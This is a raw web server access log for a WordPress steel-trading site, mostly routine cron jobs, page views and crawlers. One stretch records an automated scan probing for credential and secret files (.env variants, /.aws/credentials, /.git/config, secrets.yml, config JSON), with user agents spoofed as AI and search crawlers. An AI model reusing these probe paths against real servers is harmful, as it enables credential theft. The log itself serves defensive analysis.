File: //home/logs/cqqizhou_access_2026-06-11.log
36.133.115.36 - - [11/Jun/2026:00:07:48 +0800] "POST /wp-cron.php?doing_wp_cron=1781107668.5797779560089111328125 HTTP/1.1" 200 31 "-" "WordPress/6.9; http://cqqizhou.com"
165.154.162.242 - - [11/Jun/2026:00:07:48 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0"
165.154.162.242 - - [11/Jun/2026:00:07:53 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0"
165.154.162.242 - - [11/Jun/2026:00:07:56 +0800] "GET / HTTP/1.1" 200 35637 "http://36.133.115.36:80" "Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0"
36.133.115.36 - - [11/Jun/2026:00:08:40 +0800] "POST /wp-cron.php?doing_wp_cron=1781107720.5774810314178466796875 HTTP/1.1" 200 31 "-" "WordPress/6.9; http://cqqizhou.com"
165.154.36.110 - - [11/Jun/2026:00:08:40 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.4 Safari/605.1.15"
165.154.36.110 - - [11/Jun/2026:00:08:45 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.4 Safari/605.1.15"
165.154.36.110 - - [11/Jun/2026:00:08:48 +0800] "GET / HTTP/1.1" 200 35637 "http://36.133.115.36:80" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.4 Safari/605.1.15"
36.133.115.36 - - [11/Jun/2026:00:16:34 +0800] "POST /wp-cron.php?doing_wp_cron=1781108194.4830000400543212890625 HTTP/1.1" 200 31 "-" "WordPress/6.9; http://cqqizhou.com"
43.130.110.130 - - [11/Jun/2026:00:16:34 +0800] "GET / HTTP/1.1" 200 35194 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
36.133.115.36 - - [11/Jun/2026:00:27:19 +0800] "POST /wp-cron.php?doing_wp_cron=1781108839.3634281158447265625000 HTTP/1.1" 200 31 "-" "WordPress/6.9; http://cqqizhou.com"
47.128.30.63 - - [11/Jun/2026:00:27:19 +0800] "GET /robots.txt HTTP/1.1" 200 190 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
36.133.115.36 - - [11/Jun/2026:00:30:46 +0800] "POST /wp-cron.php?doing_wp_cron=1781109046.5496261119842529296875 HTTP/1.1" 200 31 "-" "WordPress/6.9; http://cqqizhou.com"
119.84.246.117 - - [11/Jun/2026:00:30:46 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.1; zh_CN) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/18.0 BIDUBrowser/2.6 Safari/534.7"
119.84.246.117 - - [11/Jun/2026:00:30:46 +0800] "GET / HTTP/1.1" 200 160339 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.1; zh_CN) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/18.0 BIDUBrowser/2.6 Safari/534.7"
119.84.246.117 - - [11/Jun/2026:00:30:47 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.19 (KHTML, like Gecko) Chrome/18.0.1025.168 Safari/535.19 QIHU 360EE"
119.84.246.117 - - [11/Jun/2026:00:30:47 +0800] "GET / HTTP/1.1" 200 160339 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.19 (KHTML, like Gecko) Chrome/18.0.1025.168 Safari/535.19 QIHU 360EE"
119.84.246.117 - - [11/Jun/2026:00:30:48 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.1; zh_CN) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/18.0 BIDUBrowser/2.6 Safari/534.7"
119.84.246.117 - - [11/Jun/2026:00:30:48 +0800] "GET / HTTP/1.1" 200 160339 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.1; zh_CN) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/18.0 BIDUBrowser/2.6 Safari/534.7"
36.133.115.36 - - [11/Jun/2026:00:38:31 +0800] "POST /wp-cron.php?doing_wp_cron=1781109511.6918649673461914062500 HTTP/1.1" 200 31 "-" "WordPress/6.9; http://cqqizhou.com"
27.124.17.174 - - [11/Jun/2026:00:38:31 +0800] "GET /CMS/Login.aspx HTTP/1.1" 404 9410 "-" "Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36"
36.133.115.36 - - [11/Jun/2026:00:40:12 +0800] "POST /wp-cron.php?doing_wp_cron=1781109612.7776460647583007812500 HTTP/1.1" 200 31 "-" "WordPress/6.9; http://cqqizhou.com"
43.130.34.74 - - [11/Jun/2026:00:40:12 +0800] "GET / HTTP/1.1" 200 35193 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
216.244.66.245 - - [11/Jun/2026:00:40:57 +0800] "GET /robots.txt HTTP/1.1" 200 390 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
216.244.66.245 - - [11/Jun/2026:00:46:28 +0800] "GET /bug HTTP/1.1" 200 49170 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
36.133.115.36 - - [11/Jun/2026:00:53:34 +0800] "POST /wp-cron.php?doing_wp_cron=1781110414.4029419422149658203125 HTTP/1.1" 200 31 "-" "WordPress/6.9; http://cqqizhou.com"
110.230.250.42 - - [11/Jun/2026:00:53:34 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 16_0 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.0 Mobile/15E148 Safari/604.1"
110.230.250.42 - - [11/Jun/2026:00:53:35 +0800] "GET / HTTP/1.1" 200 35194 "http://www.cqqizhou.com/" "Mozilla/5.0 (iPhone; CPU iPhone OS 16_0 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.0 Mobile/15E148 Safari/604.1"
36.133.115.36 - - [11/Jun/2026:00:54:24 +0800] "POST /wp-cron.php?doing_wp_cron=1781110464.6444909572601318359375 HTTP/1.1" 200 31 "-" "WordPress/6.9; http://cqqizhou.com"
221.232.242.120 - - [11/Jun/2026:00:54:24 +0800] "GET / HTTP/1.1" 200 35194 "-" "Mozilla/5.0 (Linux; Android 11; Pixel 5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.53 Mobile Safari/537.36"
221.232.242.120 - - [11/Jun/2026:00:54:24 +0800] "GET /wp-content/uploads/2025/07/1751425283-qizhou.kf_.qq_.com_.webp HTTP/1.1" 200 16864 "http://cqqizhou.com/" "Mozilla/5.0 (Linux; Android 11; Pixel 5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.53 Mobile Safari/537.36"
36.133.115.36 - - [11/Jun/2026:01:03:26 +0800] "POST /wp-cron.php?doing_wp_cron=1781111006.8453350067138671875000 HTTP/1.1" 200 31 "-" "WordPress/6.9; http://cqqizhou.com"
36.133.108.119 - - [11/Jun/2026:01:03:26 +0800] "HEAD /SDK/webLanguage HTTP/1.1" 404 0 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/533.20.25 (KHTML, like Gecko) Version/5.0.4 Safari/533.20.27"
36.133.115.36 - - [11/Jun/2026:01:07:56 +0800] "POST /wp-cron.php?doing_wp_cron=1781111276.4980061054229736328125 HTTP/1.1" 200 31 "-" "WordPress/6.9; http://cqqizhou.com"
5.61.209.96 - - [11/Jun/2026:01:07:56 +0800] "GET /SDK/webLanguage HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
106.8.139.8 - - [11/Jun/2026:01:26:17 +0800] "GET /wp-content/uploads/2026/01/1767691466-Article_images_W900%C3%97500px202601061.webp HTTP/1.1" 200 56014 "http://cqqizhou.com/news/2420" "YisouSpider"
106.8.139.40 - - [11/Jun/2026:01:26:18 +0800] "GET /wp-content/uploads/2026/01/1767691467-Article_images_W900%C3%97500px202601062.webp HTTP/1.1" 200 49670 "http://cqqizhou.com/news/2420" "YisouSpider"
142.44.225.164 - - [11/Jun/2026:01:29:02 +0800] "GET /news/2535 HTTP/1.1" 200 20406 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
36.133.115.36 - - [11/Jun/2026:01:35:08 +0800] "POST /wp-cron.php?doing_wp_cron=1781112908.7707259654998779296875 HTTP/1.1" 200 31 "-" "WordPress/6.9; http://cqqizhou.com"
89.116.210.99 - - [11/Jun/2026:01:35:08 +0800] "GET / HTTP/1.1" 200 35194 "-" "Mozilla/5.0 (Linux; Android 14; SM-S928B) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Mobile Safari/537.36"
89.116.210.99 - - [11/Jun/2026:01:35:26 +0800] "GET /application.properties HTTP/1.1" 404 9410 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko); compatible; ClaudeBot/1.0; +mailto:support@anthropic.com"
89.116.210.99 - - [11/Jun/2026:01:35:28 +0800] "GET /application.yml HTTP/1.1" 404 9410 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko); compatible; ClaudeBot/1.0; +mailto:support@anthropic.com"
89.116.210.99 - - [11/Jun/2026:01:35:28 +0800] "GET /secrets.yml HTTP/1.1" 404 9410 "-" "anthropic-ai"
89.116.210.99 - - [11/Jun/2026:01:35:28 +0800] "GET /storage/logs/laravel.log HTTP/1.1" 404 9410 "-" "Mozilla/5.0 (compatible; Bytespider; spider-feedback@bytedance.com)"
89.116.210.99 - - [11/Jun/2026:01:35:30 +0800] "GET /secrets.json HTTP/1.1" 404 9408 "-" "Mozilla/5.0 (compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot)"
89.116.210.99 - - [11/Jun/2026:01:35:31 +0800] "GET /account.json HTTP/1.1" 404 9410 "-" "Mozilla/5.0 (compatible; Claude-Web/1.0; +https://www.anthropic.com)"
89.116.210.99 - - [11/Jun/2026:01:35:32 +0800] "GET /.aws/credentials HTTP/1.1" 404 9410 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko); compatible; ClaudeBot/1.0; +mailto:support@anthropic.com"
89.116.210.99 - - [11/Jun/2026:01:35:32 +0800] "GET /config/secrets.yml HTTP/1.1" 404 9410 "-" "Mozilla/5.0 (compatible; Bytespider; spider-feedback@bytedance.com)"
89.116.210.99 - - [11/Jun/2026:01:35:32 +0800] "GET /config/application.properties HTTP/1.1" 404 9410 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko); compatible; OAI-SearchBot/1.0; +https://openai.com/searchbot"
89.116.210.99 - - [11/Jun/2026:01:35:32 +0800] "GET /.env HTTP/1.1" 404 9410 "-" "Mozilla/5.0 (compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot)"
89.116.210.99 - - [11/Jun/2026:01:35:33 +0800] "GET /.git/config HTTP/1.1" 404 9410 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko); compatible; OAI-SearchBot/1.0; +https://openai.com/searchbot"
89.116.210.99 - - [11/Jun/2026:01:35:33 +0800] "GET /.env.example HTTP/1.1" 404 9410 "-" "Mozilla/5.0 (compatible; Bytespider; spider-feedback@bytedance.com)"
89.116.210.99 - - [11/Jun/2026:01:35:34 +0800] "GET /.env.local HTTP/1.1" 404 9411 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
89.116.210.99 - - [11/Jun/2026:01:35:34 +0800] "GET /.env.development HTTP/1.1" 404 9411 "-" "Mozilla/5.0 (compatible; Google-Extended/1.0; +http://www.google.com/bot.html)"
89.116.210.99 - - [11/Jun/2026:01:35:35 +0800] "GET /.env.backup HTTP/1.1" 404 9410 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko); compatible; OAI-SearchBot/1.0; +https://openai.com/searchbot"
89.116.210.99 - - [11/Jun/2026:01:35:36 +0800] "GET /.env.production HTTP/1.1" 404 9410 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko); compatible; OAI-SearchBot/1.0; +https://openai.com/searchbot"
89.116.210.99 - - [11/Jun/2026:01:35:36 +0800] "GET /.env.bak HTTP/1.1" 404 9410 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko); compatible; ClaudeBot/1.0; +mailto:support@anthropic.com"
89.116.210.99 - - [11/Jun/2026:01:35:37 +0800] "GET /.env.old HTTP/1.1" 404 9410 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
89.116.210.99 - - [11/Jun/2026:01:35:40 +0800] "GET /.env.test HTTP/1.1" 404 9408 "-" "Mozilla/5.0 (compatible; cohere-ai/1.0; +https://cohere.com)"
89.116.210.99 - - [11/Jun/2026:01:35:40 +0800] "GET /config.env HTTP/1.1" 404 9408 "-" "Mozilla/5.0 (compatible; cohere-ai/1.0; +https://cohere.com)"
89.116.210.99 - - [11/Jun/2026:01:35:41 +0800] "GET /.env.staging HTTP/1.1" 404 9410 "-" "anthropic-ai"
89.116.210.99 - - [11/Jun/2026:01:35:42 +0800] "GET /api/.env HTTP/1.1" 404 9410 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko); compatible; GPTBot/1.2; +https://openai.com/gptbot"
89.116.210.99 - - [11/Jun/2026:01:35:42 +0800] "GET /admin/.env HTTP/1.1" 404 9410 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
89.116.210.99 - - [11/Jun/2026:01:35:44 +0800] "GET /app/.env HTTP/1.1" 404 9411 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko); compatible; PerplexityBot/1.0; +https://perplexity.ai/perplexitybot"
89.116.210.99 - - [11/Jun/2026:01:35:55 +0800] "GET /__/firebase/init.json HTTP/1.1" 404 9410 "-" "Mozilla/5.0 (compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot)"
89.116.210.99 - - [11/Jun/2026:01:35:56 +0800] "GET /api/settings HTTP/1.1" 404 9410 "-" "Mozilla/5.0 (compatible; Claude-Web/1.0; +https://www.anthropic.com)"
89.116.210.99 - - [11/Jun/2026:01:35:56 +0800] "GET /api/config HTTP/1.1" 404 9410 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko); compatible; PerplexityBot/1.0; +https://perplexity.ai/perplexitybot"
89.116.210.99 - - [11/Jun/2026:01:35:56 +0800] "GET /config.json HTTP/1.1" 404 9410 "-" "Mozilla/5.0 (compatible; Bytespider; spider-feedback@bytedance.com)"
89.116.210.99 - - [11/Jun/2026:01:35:59 +0800] "GET /settings.json HTTP/1.1" 404 9410 "-" "Mozilla/5.0 (compatible; Applebot/0.1; +http://www.apple.com/go/applebot)"
89.116.210.99 - - [11/Jun/2026:01:35:59 +0800] "GET /api/v1/settings HTTP/1.1" 404 9410 "-" "Mozilla/5.0 (compatible; Bytespider; spider-feedback@bytedance.com)"
89.116.210.99 - - [11/Jun/2026:01:35:59 +0800] "GET /firebase-config.json HTTP/1.1" 404 9410 "-" "Mozilla/5.0 (compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot)"
89.116.210.99 - - [11/Jun/2026:01:36:00 +0800] "GET /.well-known/jwks.json HTTP/1.1" 404 9410 "-" "anthropic-ai"
89.116.210.99 - - [11/Jun/2026:01:36:00 +0800] "GET /api/v1/config HTTP/1.1" 404 9409 "-" "Mozilla/5.0 (compatible; Applebot/0.1; +http://www.apple.com/go/applebot)"
89.116.210.99 - - [11/Jun/2026:01:36:01 +0800] "GET /api/v2/config HTTP/1.1" 404 9410 "-" "Mozilla/5.0 (compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot)"
89.116.210.99 - - [11/Jun/2026:01:36:01 +0800] "GET /env.json HTTP/1.1" 404 9410 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko); compatible; ChatGPT-User/1.0; +https://openai.com/bot"
89.116.210.99 - - [11/Jun/2026:01:36:02 +0800] "GET /api/env HTTP/1.1" 404 9410 "-" "Mozilla/5.0 (compatible; Bytespider; spider-feedback@bytedance.com)"
89.116.210.99 - - [11/Jun/2026:01:36:03 +0800] "GET /api/v2/settings HTTP/1.1" 404 9410 "-" "Mozilla/5.0 (compatible; Claude-Web/1.0; +https://www.anthropic.com)"
89.116.210.99 - - [11/Jun/2026:01:36:06 +0800] "GET /manifest.webmanifest HTTP/1.1" 404 9410 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko); compatible; Perplexity-User/1.0; +https://perplexity.ai/perplexity-user"
89.116.210.99 - - [11/Jun/2026:01:36:07 +0800] "GET /openapi.json HTTP/1.1" 404 9410 "-" "Mozilla/5.0 (compatible; Claude-Web/1.0; +https://www.anthropic.com)"
89.116.210.99 - - [11/Jun/2026:01:36:07 +0800] "GET /api/openapi.json HTTP/1.1" 200 25237 "-" "Mozilla/5.0 (compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot)"
36.133.115.36 - - [11/Jun/2026:01:36:10 +0800] "POST /wp-cron.php?doing_wp_cron=1781112970.7018289566040039062500 HTTP/1.1" 200 31 "-" "WordPress/6.9; http://cqqizhou.com"
89.116.210.99 - - [11/Jun/2026:01:36:10 +0800] "GET /api/account HTTP/1.1" 404 9409 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko); compatible; ChatGPT-User/1.0; +https://openai.com/bot"
89.116.210.99 - - [11/Jun/2026:01:36:10 +0800] "GET /app-config.json HTTP/1.1" 404 9409 "-" "Mozilla/5.0 (compatible; Claude-Web/1.0; +https://www.anthropic.com)"
89.116.210.99 - - [11/Jun/2026:01:36:11 +0800] "GET /api/health HTTP/1.1" 404 9410 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko); compatible; ClaudeBot/1.0; +mailto:support@anthropic.com"
89.116.210.99 - - [11/Jun/2026:01:36:11 +0800] "GET /api/v1/env HTTP/1.1" 404 9410 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko); compatible; Perplexity-User/1.0; +https://perplexity.ai/perplexity-user"
89.116.210.99 - - [11/Jun/2026:01:36:13 +0800] "GET /ngsw.json HTTP/1.1" 499 0 "-" "CCBot/2.0 (https://commoncrawl.org/faq/)"
36.133.115.36 - - [11/Jun/2026:01:37:16 +0800] "POST /wp-cron.php?doing_wp_cron=1781113036.7567389011383056640625 HTTP/1.1" 200 31 "-" "WordPress/6.9; http://cqqizhou.com"
89.116.210.99 - - [11/Jun/2026:01:37:16 +0800] "GET /media HTTP/1.1" 200 26596 "-" "Mozilla/5.0 (Linux; Android 14; Pixel 8) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Mobile Safari/537.36"
89.116.210.99 - - [11/Jun/2026:01:37:17 +0800] "GET /news HTTP/1.1" 200 26113 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14.7; rv:133.0) Gecko/20100101 Firefox/133.0"
89.116.210.99 - - [11/Jun/2026:01:37:18 +0800] "GET /logistics HTTP/1.1" 200 26175 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.0 Safari/605.1.15"
89.116.210.99 - - [11/Jun/2026:01:37:19 +0800] "GET /services HTTP/1.1" 200 26366 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 17_7 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.7 Mobile/15E148 Safari/604.1"
89.116.210.99 - - [11/Jun/2026:01:37:19 +0800] "GET /about HTTP/1.1" 200 24644 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_0 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.0 Mobile/15E148 Safari/604.1"
89.116.210.99 - - [11/Jun/2026:01:37:20 +0800] "GET /contacts/ HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Linux; Android 14; CPH2557) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Mobile Safari/537.36"
89.116.210.99 - - [11/Jun/2026:01:37:20 +0800] "GET /contacts HTTP/1.1" 200 22096 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36"
89.116.210.99 - - [11/Jun/2026:01:37:20 +0800] "GET /services/ HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Linux; Android 14; Pixel 8) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Mobile Safari/537.36"
89.116.210.99 - - [11/Jun/2026:01:37:21 +0800] "GET /news/portfolio/%e5%86%b7%e8%bd%a7%e6%9d%bf HTTP/1.1" 200 22712 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.10.0.0 Safari/537.36"
89.116.210.99 - - [11/Jun/2026:01:37:21 +0800] "GET /logistics/ HTTP/1.1" 301 5 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_0 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.0 Mobile/15E148 Safari/604.1"
89.116.210.99 - - [11/Jun/2026:01:37:23 +0800] "GET /news/portfolio-category/cold-rolled-coil HTTP/1.1" 200 21681 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36"
89.116.210.99 - - [11/Jun/2026:01:37:24 +0800] "GET /contacts HTTP/1.1" 200 19099 "http://cqqizhou.com/contacts/" "Mozilla/5.0 (Linux; Android 14; CPH2557) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Mobile Safari/537.36"
89.116.210.99 - - [11/Jun/2026:01:37:25 +0800] "GET /logistics HTTP/1.1" 200 25820 "http://cqqizhou.com/logistics/" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_0 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.0 Mobile/15E148 Safari/604.1"
89.116.210.99 - - [11/Jun/2026:01:37:25 +0800] "GET /services HTTP/1.1" 200 26364 "http://cqqizhou.com/services/" "Mozilla/5.0 (Linux; Android 14; Pixel 8) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Mobile Safari/537.36"
89.116.210.99 - - [11/Jun/2026:01:37:25 +0800] "GET /news/portfolio-category/dual-phase-steel HTTP/1.1" 200 21674 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
89.116.210.99 - - [11/Jun/2026:01:37:27 +0800] "GET /news/portfolio-category/hot-dip-galvanized-coil HTTP/1.1" 200 18324 "-" "Mozilla/5.0 (Linux; Android 14; SM-S921B) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Mobile Safari/537.36"
89.116.210.99 - - [11/Jun/2026:01:37:29 +0800] "GET /news/portfolio/duplex-stainless-steel HTTP/1.1" 200 22778 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
89.116.210.99 - - [11/Jun/2026:01:37:32 +0800] "GET /news/portfolio/hot-dip-galvanized-coil HTTP/1.1" 200 19402 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1 Mobile/15E148 Safari/604.1"
62.4.13.166 - - [11/Jun/2026:01:38:30 +0800] "GET /contacts HTTP/1.1" 200 22096 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0"
36.133.115.36 - - [11/Jun/2026:01:41:40 +0800] "POST /wp-cron.php?doing_wp_cron=1781113300.6243040561676025390625 HTTP/1.1" 200 31 "-" "WordPress/6.9; http://cqqizhou.com"
112.32.139.163 - - [11/Jun/2026:01:41:40 +0800] "GET /Ly9jcXFpemhvdS5jb20vd3AtY29udGVudC91cGxvYWRzLzIwMjUvMTIvMTc2NTI2ODk1NS1xaXpob3VfU2xpZGVyMV8zODQww5cyMTYwXzIwMjUxMjEwLXNjYWxlZC53ZWJw HTTP/1.1" 404 9408 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.27"
117.62.97.248 - - [11/Jun/2026:01:41:51 +0800] "GET /Ly9jcXFpemhvdS5jb20vd3AtY29udGVudC91cGxvYWRzL3JldnNsaWRlci9zbGlkZXItMS8xNzUwODYxMTU2LWxvZ2lzdGljc19TbGlkZXJfMzg0MMOXMjE2MF8yMDI1MDYyNTE5MTM1Ni1zY2FsZWQud2VicA== HTTP/1.1" 404 9410 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.16"
36.133.115.36 - - [11/Jun/2026:01:43:10 +0800] "POST /wp-cron.php?doing_wp_cron=1781113390.4816350936889648437500 HTTP/1.1" 200 31 "-" "WordPress/6.9; http://cqqizhou.com"
13.58.178.173 - - [11/Jun/2026:01:43:10 +0800] "GET / HTTP/1.1" 301 5 "-" "visionheight.com/scan Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/126.0.0.0 Safari/537.36"
13.58.178.173 - - [11/Jun/2026:01:43:15 +0800] "GET / HTTP/1.1" 200 35637 "http://36.133.115.36/" "visionheight.com/scan Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/126.0.0.0 Safari/537.36"
36.133.115.36 - - [11/Jun/2026:01:44:11 +0800] "POST /wp-cron.php?doing_wp_cron=1781113451.4863989353179931640625 HTTP/1.1" 200 31 "-" "WordPress/6.9; http://cqqizhou.com"
13.58.178.173 - - [11/Jun/2026:01:44:11 +0800] "GET / HTTP/1.1" 301 5 "-" "visionheight.com/scan Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/126.0.0.0 Safari/537.36"
121.237.36.28 - - [11/Jun/2026:01:45:00 +0800] "GET / HTTP/1.1" 200 35637 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11) AppleWebKit/601.1.27 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/601.1.27"
36.133.115.36 - - [11/Jun/2026:01:46:15 +0800] "POST /wp-cron.php?doing_wp_cron=1781113575.8648550510406494140625 HTTP/1.1" 200 31 "-" "WordPress/6.9; http://cqqizhou.com"
121.237.36.31 - - [11/Jun/2026:01:46:15 +0800] "GET / HTTP/1.1" 200 35194 "-" "Dalvik/2.1.0 (Linux; U; Android 9.0; ZTE BA520 Build/MRA58K)"
36.133.115.36 - - [11/Jun/2026:01:47:55 +0800] "POST /wp-cron.php?doing_wp_cron=1781113675.2088129520416259765625 HTTP/1.1" 200 31 "-" "WordPress/6.9; http://cqqizhou.com"
113.195.84.161 - - [11/Jun/2026:01:47:55 +0800] "GET /Ly9jcXFpemhvdS5jb20vd3AtY29udGVudC91cGxvYWRzLzIwMjYvMDEvMTc2ODI3NjExOS1xaXpob3VqaWFnb25nX1NsaWRlcl8zODQww5cyMTYwXzIwMjYwMTEzLXNjYWxlZC53ZWJw HTTP/1.1" 404 9410 "-" "Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88"
183.207.45.108 - - [11/Jun/2026:01:50:35 +0800] "GET / HTTP/1.1" 200 160339 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.104 Safari/537.36"
36.133.115.36 - - [11/Jun/2026:01:53:56 +0800] "POST /wp-cron.php?doing_wp_cron=1781114036.1774809360504150390625 HTTP/1.1" 200 31 "-" "WordPress/6.9; http://cqqizhou.com"
121.237.36.31 - - [11/Jun/2026:01:53:56 +0800] "GET / HTTP/1.1" 200 35194 "-" "Mozilla/5.0 (Linux; U; Android 6.0.1; zh-cn; SM919 Build/MXB48T) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/57.0.2987.132 MQQBrowser/8.7 Mobile Safari/537.36"
36.133.115.36 - - [11/Jun/2026:02:15:59 +0800] "POST /wp-cron.php?doing_wp_cron=1781115359.1970911026000976562500 HTTP/1.1" 200 31 "-" "WordPress/6.9; http://cqqizhou.com"
